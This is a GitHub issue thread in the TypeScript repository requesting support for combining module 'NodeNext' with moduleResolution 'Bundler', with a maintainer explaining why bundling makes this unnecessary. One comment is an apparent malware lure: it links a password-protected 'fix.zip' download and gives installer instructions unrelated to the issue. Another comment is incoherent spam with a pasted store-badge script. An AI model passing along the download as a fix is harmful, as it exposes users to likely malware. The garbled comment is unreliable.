### ISSUE TITLE
Allow module resolution Bundler with module NodeNext

### ISSUE THREAD

**Issue by a88zach** [microsoft/TypeScript#59756]
### 🔍 Search Terms

NodeNext Bundler

### ✅ Viability Checklist

- [X] This wouldn't be a breaking change in existing TypeScript/JavaScript code
- [X] This wouldn't change the runtime behavior of existing JavaScript code
- [X] This could be implemented without emitting different JS based on the types of the expressions
- [X] This isn't a runtime feature (e.g. library functionality, non-ECMAScript syntax with JavaScript output, new syntax sugar for JS, etc.)
- [X] This isn't a request to add a new utility type: https://github.com/microsoft/TypeScript/wiki/No-New-Utility-Types
- [X] This feature would agree with the rest of our Design Goals: https://github.com/Microsoft/TypeScript/wiki/TypeScript-Design-Goals

### ⭐ Suggestion

Allow the use of `module: "NodeNext"` with `moduleResolution: "Bundler"`

If you are building an application with Typescript that is going to run in Node.js and you want to output an ES module, you will need to use a bundler like Webpack to transform the Typescript output into a format that will run in Node.js if you are using .ts extension when importing other modules

Currently, you can use `moduleResolution: "NodeNext"` with `allowImportingTsExtensions: true` and then use a bundler to transform the .ts extensions into .js extensions.  However, if  you use are using a bundler anyways, then using `moduleResolution: "Bundler"` will also allow you to write imports without the .ts extension and without having to set `allowImportingTsExtensions: true,`

### 📃 Motivating Example

You can now use the new module resolution of Bundler with NodeNext

### 💻 Use Cases

1. What do you want to use this for?  Creating Node.js application in esm format
3. What shortcomings exist with current approaches?  You cannot use the module resolution of Bundler with NodeNext
4. What workarounds are you using in the meantime?  Setting `allowImportingTsExtensions: true` and then use a bundler to rewrite the .ts extensions to .js

**Comment by xiaobai-marker** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by andrewbranch** [comment]
What exactly do you want from `--module nodenext --moduleResolution bundler` that you’re not getting out of `--module preserve --moduleResolution bundler`?

**Comment by a88zach** [comment]
@andrewbranch I'm currently working in a NX mono repo and I'm converting my applications and libraries to esm.  Currently all my apps have been converted to esm, but my libraries are still using `--module commonjs --moduleResolution node`.  

* When I use `--module preserve --moduleResolution bundler`, the libraries preserve the import statements
* When I use `--module nodenext --moduleResolution nodenext`, the libraries are correctly using require syntax while the applications correctly use import syntax

Here is a compare of how one of the library files is output using the different options
[59756-diff.pdf](https://github.com/user-attachments/files/16854058/59756-diff.pdf)

With NodeNext, my circular references are resolved correctly.  With Preserve, my application won't start up because of accessing references before initialization.  Obviously, it would be preferred to unwind all circular references, but it's easier said than done when using typegoose and typegraphql :)

**Comment by a88zach** [comment]
@andrewbranch here is a repo to demonstrate:  https://github.com/a88zach/ts-59756

Instructions in the README.md

**Comment by andrewbranch** [comment]
When you’re talking about the output, are you looking at the output of `tsc` or the output of Webpack?

**Comment by a88zach** [comment]
The attached file above is the compare of the tsc output.

I'll also update the example provided to emit the output so that it's clear this is about the tsc output and not the webpack output

**Comment by andrewbranch** [comment]
Can you clarify, for each TS project in the example repo, all the ways you intend to build, publish, import, and/or run the code? With the mix of tsc, webpack, `--module nodenext` and `--moduleResolution bundler`, I'm struggling to understand all the requirements here.

**Comment by andrewbranch** [comment]
You’re seeing a bug or limitation of Webpack, or your particular setup with Webpack. I don’t know what the Nx plugins/config for Webpack are doing under the hood, but it’s actually weird to me that `module` is even affecting its output. Most bundlers/loaders these days don’t depend on tsc’s module output. There’s no reason they should, since the result of bundling is the _removal_ of module constructs. The bundlers/loaders typically just read and understand the imports in the input files and produce a _bundle_ with no imports/requires in the output. You shouldn’t really have to worry about what tsc would produce here at all. That’s why it doesn’t make sense to allow `--module nodenext --moduleResolution bundler`. The module output constructs from tsc should be completely irrelevant any time you’re bundling.

**Comment by code30x58** [comment]
AWS cloud tools codices intervened leak on QR codes seen as a error message with a endless connection report buffering page to a file structure ms dos

<script type="module" src="https://get.microsoft.com/badge/ms-store-badge.bundled.js"></script>
<ms-store-badge
      productid=""
      window-mode="full"
      theme="auto"
      language="en-us"
      animation="on">
</ms-store-badge>
________________________________
